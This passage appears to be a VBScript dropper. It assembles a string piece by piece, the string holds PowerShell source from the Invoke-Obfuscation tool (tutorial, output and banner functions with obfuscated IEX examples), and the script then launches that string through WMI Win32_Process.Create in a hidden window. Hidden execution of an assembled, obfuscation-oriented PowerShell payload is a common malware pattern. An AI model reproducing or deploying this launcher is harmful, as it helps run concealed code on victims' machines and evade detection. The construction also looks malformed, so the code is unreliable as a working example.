ForEach($Command in $Inp"
Ouzw = Ouzw + "utOptionsCommands)
{
$Counter+"
Ouzw = Ouzw + "+
Write-Host $Command.ToUpper() -NoNew"
Ouzw = Ouzw + "Line -ForegroundColor Yellow
If($Count"
Ouzw = Ouzw + "er -lt $InputOptionsCommands.Count) {Write-Host ',"
Ouzw = Ouzw + "' -NoNewLine}
}
Write-Host ''
"
Ouzw = Ouzw + "}
}
Function Show-Tutorial
{
<#
.SYNOPSIS
HELPE"
Ouzw = Ouzw + "R FUNCTION :: Displays tutorial information for In"
Ouzw = Ouzw + "voke-Obfuscation.
Invoke-Obfuscation Function: Sh"
Ouzw = Ouzw + "ow-Tutorial
Author: Daniel Bohannon (@danielhbohan"
Ouzw = Ouzw + "non)
License: Apache License, Version 2.0
Required"
Ouzw = Ouzw + " Dependencies: None
Optional Dependencies: None
"
Ouzw = Ouzw + ".DESCRIPTION
Show-Tutorial displays tutorial info"
Ouzw = Ouzw + "rmation for Invoke-Obfuscation.
.EXAMPLE
C:\PS> "
Ouzw = Ouzw + "Show-Tutorial
.NOTES
This is a personal project "
Ouzw = Ouzw + "developed by Daniel Bohannon while an employee at "
Ouzw = Ouzw + "MANDIANT, A FireEye Company.
.LINK
http://www.da"
Ouzw = Ouzw + "nielbohannon.com
#>
Write-Host "`n`nTUTORIAL""
Ouzw = Ouzw + " -NoNewLine -ForegroundColor Cyan
Write-Host ""
Ouzw = Ouzw + " :: Here is a quick tutorial showing you how to ge"
Ouzw = Ouzw + "t your obfuscation on:"
Write-Host "`n1) "
Ouzw = Ouzw + "" -NoNewLine -ForegroundColor Cyan
Write-Host "
Ouzw = Ouzw + ""Load a scriptblock (SET SCRIPTBLOCK) or a script "
Ouzw = Ouzw + "path/URL (SET SCRIPTPATH)."
Write-Host " SET"
Ouzw = Ouzw + " SCRIPTBLOCK Write-Host 'This is my test command' "
Ouzw = Ouzw + "-ForegroundColor Green" -ForegroundColor Green
"
Ouzw = Ouzw + "
Write-Host "`n2) " -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host "Navigate through the obfus"
Ouzw = Ouzw + "cation menus where the options are in" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " YELLOW" -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Yellow
Write-Host "."
Write-Host " GR"
Ouzw = Ouzw + "EEN" -NoNewLine -ForegroundColor Green
Write-H"
Ouzw = Ouzw + "ost " options apply obfuscation."
Write-Host ""
Ouzw = Ouzw + " Enter" -NoNewLine
Write-Host " BACK" -NoNew"
Ouzw = Ouzw + "Line -ForegroundColor Yellow
Write-Host "/" -N"
Ouzw = Ouzw + "oNewLine
Write-Host "CD .." -NoNewLine -Foregr"
Ouzw = Ouzw + "oundColor Yellow
Write-Host " to go to previou"
Ouzw = Ouzw + "s menu and" -NoNewLine
Write-Host " HOME" -NoN"
Ouzw = Ouzw + "ewline -ForegroundColor Yellow
Write-Host "/" "
Ouzw = Ouzw + "-NoNewline
Write-Host "MAIN" -NoNewline -Foreg"
Ouzw = Ouzw + "roundColor Yellow
Write-Host " to go to home m"
Ouzw = Ouzw + "enu.`n E.g. Enter" -NoNewLine
Write-Host " E"
Ouzw = Ouzw + "NCODING" -NoNewLine -ForegroundColor Yellow
Wr"
Ouzw = Ouzw + "ite-Host " & then" -NoNewLine
Write-Host " 5" "
Ouzw = Ouzw + "-NoNewLine -ForegroundColor Green
Write-Host ""
Ouzw = Ouzw + " to apply SecureString obfuscation."
Writ"
Ouzw = Ouzw + "e-Host "`n3) " -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host "Enter" -NoNewLine
Write-Host " T"
Ouzw = Ouzw + "EST" -NoNewLine -ForegroundColor Yellow
Write-"
Ouzw = Ouzw + "Host "/" -NoNewLine
Write-Host "EXEC" -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Yellow
Write-Host " to tes"
Ouzw = Ouzw + "t the obfuscated command locally.`n Enter" -NoNe"
Ouzw = Ouzw + "wLine
Write-Host " SHOW" -NoNewLine -Foregroun"
Ouzw = Ouzw + "dColor Yellow
Write-Host " to see the currentl"
Ouzw = Ouzw + "y obfuscated command."
Write-Host "`n4) ""
Ouzw = Ouzw + " -NoNewLine -ForegroundColor Cyan
Write-Host ""
Ouzw = Ouzw + "Enter" -NoNewLine
Write-Host " COPY" -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor Yellow
Write-Host "/" -NoNe"
Ouzw = Ouzw + "wLine
Write-Host "CLIP" -NoNewLine -Foreground"
Ouzw = Ouzw + "Color Yellow
Write-Host " to copy obfuscated c"
Ouzw = Ouzw + "ommand out to your clipboard."
Write-Host " "
Ouzw = Ouzw + "Enter" -NoNewLine
Write-Host " OUT" -NoNewLine"
Ouzw = Ouzw + " -ForegroundColor Yellow
Write-Host " to write"
Ouzw = Ouzw + " obfuscated command out to disk."
Write-H"
Ouzw = Ouzw + "ost "`n5) " -NoNewLine -ForegroundColor Cyan
W"
Ouzw = Ouzw + "rite-Host "Enter" -NoNewLine
Write-Host " RESE"
Ouzw = Ouzw + "T" -NoNewLine -ForegroundColor Yellow
Write-Ho"
Ouzw = Ouzw + "st " to remove all obfuscation and start over.`n "
Ouzw = Ouzw + " Enter" -NoNewLine
Write-Host " UNDO" -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Yellow
Write-Host " to und"
Ouzw = Ouzw + "o last obfuscation.`n Enter" -NoNewLine
Writ"
Ouzw = Ouzw + "e-Host " HELP" -NoNewLine -ForegroundColor Yellow
"
Ouzw = Ouzw + " Write-Host "/" -NoNewLine
Write-Host "?" -"
Ouzw = Ouzw + "NoNewLine -ForegroundColor Yellow
Write-Host ""
Ouzw = Ouzw + " for help menu."
Write-Host "`nAnd finall"
Ouzw = Ouzw + "y the obligatory `"Don't use this for evil, please"
Ouzw = Ouzw + "`"" -NoNewLine -ForegroundColor Cyan
Write-Hos"
Ouzw = Ouzw + "t " :)" -ForegroundColor Green
}
Function Out-Sc"
Ouzw = Ouzw + "riptContents
{
<#
.SYNOPSIS
HELPER FUNCTION :: Di"
Ouzw = Ouzw + "splays current obfuscated command for Invoke-Obfus"
Ouzw = Ouzw + "cation.
Invoke-Obfuscation Function: Out-ScriptCo"
Ouzw = Ouzw + "ntents
Author: Daniel Bohannon (@danielhbohannon)
"
Ouzw = Ouzw + "License: Apache License, Version 2.0
Required Depe"
Ouzw = Ouzw + "ndencies: None
Optional Dependencies: None
.DESC"
Ouzw = Ouzw + "RIPTION
Out-ScriptContents displays current obfus"
Ouzw = Ouzw + "cated command for Invoke-Obfuscation.
.PARAMETER "
Ouzw = Ouzw + "ScriptContents
Specifies the string containing yo"
Ouzw = Ouzw + "ur payload.
.PARAMETER PrintWarning
Switch to ou"
Ouzw = Ouzw + "tput redacted form of ScriptContents if they excee"
Ouzw = Ouzw + "d 8,190 characters.
.EXAMPLE
C:\PS> Out-ScriptCo"
Ouzw = Ouzw + "ntents
.NOTES
This is a personal project develop"
Ouzw = Ouzw + "ed by Daniel Bohannon while an employee at MANDIAN"
Ouzw = Ouzw + "T, A FireEye Company.
.LINK
http://www.danielboh"
Ouzw = Ouzw + "annon.com
#>
Param(
[Parameter(ValueF"
Ouzw = Ouzw + "romPipeline = $true)]
[String]
$Sc"
Ouzw = Ouzw + "riptContents,
[Switch]
$PrintWarn"
Ouzw = Ouzw + "ing
)
If($ScriptContents.Length -gt $CmdM"
Ouzw = Ouzw + "axLength)
{
# Output ScriptContents, h"
Ouzw = Ouzw + "andling if the size of ScriptContents exceeds $Cmd"
Ouzw = Ouzw + "MaxLength characters.
$RedactedPrintLength"
Ouzw = Ouzw + " = $CmdMaxLength/5
# Handle print"
Ouzw = Ouzw + "ing redaction message in middle of screen. #OCD
"
Ouzw = Ouzw + " $CmdLineWidth = (Get-Host).UI.RawUI.BufferSi"
Ouzw = Ouzw + "ze.Width
$RedactionMessage = "<REDACTED: O"
Ouzw = Ouzw + "bfuscatedLength = $($ScriptContents.Length)>"
"
Ouzw = Ouzw + " $CenteredRedactionMessageStartIndex = (($CmdLi"
Ouzw = Ouzw + "neWidth-$RedactionMessage.Length)/2) - "[*] Obfusc"
Ouzw = Ouzw + "atedCommand: ".Length
$CurrentRedactionMes"
Ouzw = Ouzw + "sageStartIndex = ($RedactedPrintLength % $CmdLineW"
Ouzw = Ouzw + "idth)
If($CurrentRedactionMessage"
Ouzw = Ouzw + "StartIndex -gt $CenteredRedactionMessageStartIndex"
Ouzw = Ouzw + ")
{
$RedactedPrintLength = $Re"
Ouzw = Ouzw + "dactedPrintLength-($CurrentRedactionMessageStartIn"
Ouzw = Ouzw + "dex-$CenteredRedactionMessageStartIndex)
}"
Ouzw = Ouzw + "
Else
{
$RedactedPrint"
Ouzw = Ouzw + "Length = $RedactedPrintLength+($CenteredRedactionM"
Ouzw = Ouzw + "essageStartIndex-$CurrentRedactionMessageStartInde"
Ouzw = Ouzw + "x)
}
Write-Host $ScriptConten"
Ouzw = Ouzw + "ts.SubString(0,$RedactedPrintLength) -NoNewLine -F"
Ouzw = Ouzw + "oregroundColor Magenta
Write-Host $Redacti"
Ouzw = Ouzw + "onMessage -NoNewLine -ForegroundColor Yellow
"
Ouzw = Ouzw + " Write-Host $ScriptContents.SubString($ScriptCon"
Ouzw = Ouzw + "tents.Length-$RedactedPrintLength) -ForegroundColo"
Ouzw = Ouzw + "r Magenta
}
Else
{
Write-Host "
Ouzw = Ouzw + "$ScriptContents -ForegroundColor Magenta
}
"
Ouzw = Ouzw + " # Make sure final command doesn't exceed cmd.exe"
Ouzw = Ouzw + "'s character limit.
If($ScriptContents.Length "
Ouzw = Ouzw + "-gt $CmdMaxLength)
{
If($PSBoundParame"
Ouzw = Ouzw + "ters['PrintWarning'])
{
Write-"
Ouzw = Ouzw + "Host "`nWARNING: This command exceeds the cmd.exe "
Ouzw = Ouzw + "maximum length of $CmdMaxLength." -ForegroundColor"
Ouzw = Ouzw + " Red
Write-Host " Its length i"
Ouzw = Ouzw + "s" -NoNewLine -ForegroundColor Red
Wri"
Ouzw = Ouzw + "te-Host " $($ScriptContents.Length)" -NoNewLine -F"
Ouzw = Ouzw + "oregroundColor Yellow
Write-Host " cha"
Ouzw = Ouzw + "racters." -ForegroundColor Red
}
}
} "
Ouzw = Ouzw + "
Function Show-AsciiArt
{
<#
.SYNOPSIS
"
Ouzw = Ouzw + "HELPER FUNCTION :: Displays random ASCII art for I"
Ouzw = Ouzw + "nvoke-Obfuscation.
Invoke-Obfuscation Function: S"
Ouzw = Ouzw + "how-AsciiArt
Author: Daniel Bohannon (@danielhboha"
Ouzw = Ouzw + "nnon)
License: Apache License, Version 2.0
Require"
Ouzw = Ouzw + "d Dependencies: None
Optional Dependencies: None
"
Ouzw = Ouzw + "
.DESCRIPTION
Show-AsciiArt displays random ASCII"
Ouzw = Ouzw + " art for Invoke-Obfuscation, and also displays ASC"
Ouzw = Ouzw + "II art during script startup.
.EXAMPLE
C:\PS> Sh"
Ouzw = Ouzw + "ow-AsciiArt
.NOTES
Credit for ASCII art font gen"
Ouzw = Ouzw + "eration: http://patorjk.com/software/taag/
This is"
Ouzw = Ouzw + " a personal project developed by Daniel Bohannon w"
Ouzw = Ouzw + "hile an employee at MANDIANT, A FireEye Company.
"
Ouzw = Ouzw + ".LINK
http://www.danielbohannon.com
#>
[Cmdle"
Ouzw = Ouzw + "tBinding()] Param (
[Parameter(Position = "
Ouzw = Ouzw + "0)]
[ValidateNotNullOrEmpty()]
[Sw"
Ouzw = Ouzw + "itch]
$Random
)
# Create multiple"
Ouzw = Ouzw + " ASCII art title banners.
$Spacing = "`t"
"
Ouzw = Ouzw + "$InvokeObfuscationAscii = @()
$InvokeObfuscat"
Ouzw = Ouzw + "ionAscii += $Spacing + ' ____ _"
Ouzw = Ouzw + "_ '
$InvokeObfusc"
Ouzw = Ouzw + "ationAscii += $Spacing + ' / _/___ _ ______ "
Ouzw = Ouzw + "/ /_____ '
$InvokeObfu"
Ouzw = Ouzw + "scationAscii += $Spacing + ' / // __ \ | / / __ "
Ouzw = Ouzw + "\/ //_/ _ \______ '
$InvokeOb"
Ouzw = Ouzw + "fuscationAscii += $Spacing + ' _/ // / / / |/ / /_"
Ouzw = Ouzw + "/ / ,< / __/_____/ '
$Invoke"
Ouzw = Ouzw + "ObfuscationAscii += $Spacing + '/______ /__|______"
Ouzw = Ouzw + "___/_/|_|\___/ __ _ '
$Invo"
Ouzw = Ouzw + "keObfuscationAscii += $Spacing + ' / __ \/ /_ / "
Ouzw = Ouzw + "__/_ ________________ _/ /_(_)___ ____ '
$In"
Ouzw = Ouzw + "vokeObfuscationAscii += $Spacing + ' / / / / __ \/"
Ouzw = Ouzw + " /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \'
$"
Ouzw = Ouzw + "InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ "
Ouzw = Ouzw + "/ __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /'
"
Ouzw = Ouzw + " $InvokeObfuscationAscii += $Spacing + '\____/_.__"
Ouzw = Ouzw + "_/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ '
"
Ouzw = Ouzw + "
# Ascii art to run only during script star"
Ouzw = Ouzw + "tup.
If(!$PSBoundParameters['Random'])
{
"
Ouzw = Ouzw + " $ArrowAscii = @()
$ArrowAscii += '"
Ouzw = Ouzw + " | '
$ArrowAscii += ' | '
$Arr"
Ouzw = Ouzw + "owAscii += ' \ / '
$ArrowAscii += ' V '
"
Ouzw = Ouzw + "
# Show actual obfuscation example (genera"
Ouzw = Ouzw + "ted with this tool) in reverse.
Write-Host"
Ouzw = Ouzw + " "`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t"
Ouzw = Ouzw + "93}32t93}32t34@110m111@105}115X115-101m114_112@120"
Ouzw = Ouzw + "@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q1"
Ouzw = Ouzw + "14_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{"
Ouzw = Ouzw + "112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t3"
Ouzw = Ouzw + "9V98t103V48t39-101}99}97V108}112t101_82_45{32@41X3"
Ouzw = Ouzw + "9{41_112t81_109_39m43{39-110t101@112{81t39X43@39t1"
Ouzw = Ouzw + "09_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39"
Ouzw = Ouzw + "@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m11"
Ouzw = Ouzw + "0{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70"
Ouzw = Ouzw + "-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t9"
Ouzw = Ouzw + "8m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32"
Ouzw = Ouzw + "t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q3"
Ouzw = Ouzw + "9_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_3"
Ouzw = Ouzw + "9X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_"
Ouzw = Ouzw + "111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{"
Ouzw = Ouzw + "98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t4"
Ouzw = Ouzw + "1{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}"
Ouzw = Ouzw + "98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-"
Ouzw = Ouzw + "39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t"
Ouzw = Ouzw + "39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t"
Ouzw = Ouzw + "82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m"
Ouzw = Ouzw + "91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}1"
Ouzw = Ouzw + "15_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t3"
Ouzw = Ouzw + "6V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '"
Ouzw = Ouzw + "{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Cha"
Ouzw = Ouzw + "r]) } ) -Join'' )" -ForegroundColor Cyan
S"
Ouzw = Ouzw + "tart-Sleep -Milliseconds 650
ForEach($Line"
Ouzw = Ouzw + " in $ArrowAscii) {Write-Host $Line -NoNewline; Wri"
Ouzw = Ouzw + "te-Host $Line -NoNewline; Write-Host $Line -NoNewl"
Ouzw = Ouzw + "ine; Write-Host $Line}
Start-Sleep -Millis"
Ouzw = Ouzw + "econds 100
Write-Host "`$N7 =[cha"
Ouzw = Ouzw + "r[ ] ] `"noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR"
Ouzw = Ouzw + "- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+"
Ouzw = Ouzw + "'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+"
Ouzw = Ouzw + " bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'"
Ouzw = Ouzw + "0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg"
Ouzw = Ouzw + "'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+"
Ouzw = Ouzw + "'g0'+'tIRwb'+'g0(. '((`";[Array]::Reverse(`$N7 ) ;"
Ouzw = Ouzw + " IEX (`$N7-Join '' )" -ForegroundColor Magenta
"
Ouzw = Ouzw + " Start-Sleep -Milliseconds 650
ForEach"
Ouzw = Ouzw + "($Line in $ArrowAscii) {Write-Host $Line -NoNewlin"
Ouzw = Ouzw + "e; Write-Host $Line -NoNewline; Write-Host $Line}
"
Ouzw = Ouzw + " Start-Sleep -Milliseconds 100
Wri"
Ouzw = Ouzw + "te-Host ".(`"wRIt`" + `"e-H`" + `"Ost`") ( `"I`""
Ouzw = Ouzw + " +`"nvoke`"+`"-Obfus`"+`"cat`" + `"io`" +`"n`") "
Ouzw = Ouzw + "-ForegroundColor ( 'Gre'+'en')" -ForegroundColor Y"
Ouzw = Ouzw + "ellow
Start-Sleep -Milliseconds 650
"
Ouzw = Ouzw + " ForEach($Line in $ArrowAscii) {Write-Host $Line "
Ouzw = Ouzw + "-NoNewline; Write-Host $Line}
Start-Sleep"
Ouzw = Ouzw + " -Milliseconds 100
Write-Host "Write-Host"
Ouzw = Ouzw + " `"Invoke-Obfuscation`" -ForegroundColor Green" -F"
Ouzw = Ouzw + "oregroundColor White
Start-Sleep -Millisec"
Ouzw = Ouzw + "onds 650
ForEach($Line in $ArrowAscii) {Wr"
Ouzw = Ouzw + "ite-Host $Line}
Start-Sleep -Milliseconds "
Ouzw = Ouzw + "100
# Write out below string in i"
Ouzw = Ouzw + "nteractive format.
Start-Sleep -Millisecon"
Ouzw = Ouzw + "ds 100
ForEach($Char in [Char[]]'Invoke-Ob"
Ouzw = Ouzw + "fuscation')
{
Start-Sleep -Mil"
Ouzw = Ouzw + "liseconds (Get-Random -Input @(25..200))
"
Ouzw = Ouzw + " Write-Host $Char -NoNewline -ForegroundColor Gr"
Ouzw = Ouzw + "een
}
Start-Sleep -Millis"
Ouzw = Ouzw + "econds 900
Write-Host ""
Start-Sle"
Ouzw = Ouzw + "ep -Milliseconds 300
Write-Host
#"
Ouzw = Ouzw + " Display primary ASCII art title banner.
$"
Ouzw = Ouzw + "RandomColor = (Get-Random -Input @('Green','Cyan',"
Ouzw = Ouzw + "'Yellow'))
ForEach($Line in $InvokeObfusca"
Ouzw = Ouzw + "tionAscii)
{
Write-Host $Line "
Ouzw = Ouzw + "-ForegroundColor $RandomColor
}
}
"
Ouzw = Ouzw + "Else
{
# ASCII option in Invoke-Obfusc"
Ouzw = Ouzw + "ation interactive console.
}
# Output to"
Ouzw = Ouzw + "ol banner after all ASCII art.
Write-Host ""
"
Ouzw = Ouzw + " Write-Host "`tTool :: Invoke-Obfuscation" -F"
Ouzw = Ouzw + "oregroundColor Magenta
Write-Host "`tAuthor :"
Ouzw = Ouzw + ": Daniel Bohannon (DBO)" -ForegroundColor Magenta
"
Ouzw = Ouzw + " Write-Host "`tTwitter :: @danielhbohannon" -Fo"
Ouzw = Ouzw + "regroundColor Magenta
Write-Host "`tBlog ::"
Ouzw = Ouzw + " http://danielbohannon.com" -ForegroundColor Magen"
Ouzw = Ouzw + "ta
Write-Host "`tGithub :: https://github.com"
Ouzw = Ouzw + "/danielbohannon/Invoke-Obfuscation" -ForegroundCol"
Ouzw = Ouzw + "or Magenta
Write-Host "`tVersion :: 1.8" -Fore"
Ouzw = Ouzw + "groundColor Magenta
Write-Host "`tLicense :: A"
Ouzw = Ouzw + "pache License, Version 2.0" -ForegroundColor Magen"
Ouzw = Ouzw + "ta
Write-Host "`tNotes :: If(!`$Caffeinated)"
Ouzw = Ouzw + " {Exit}" -ForegroundColor Magenta
}"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create Ouzw, Null, objConfig, intProcessID
End Function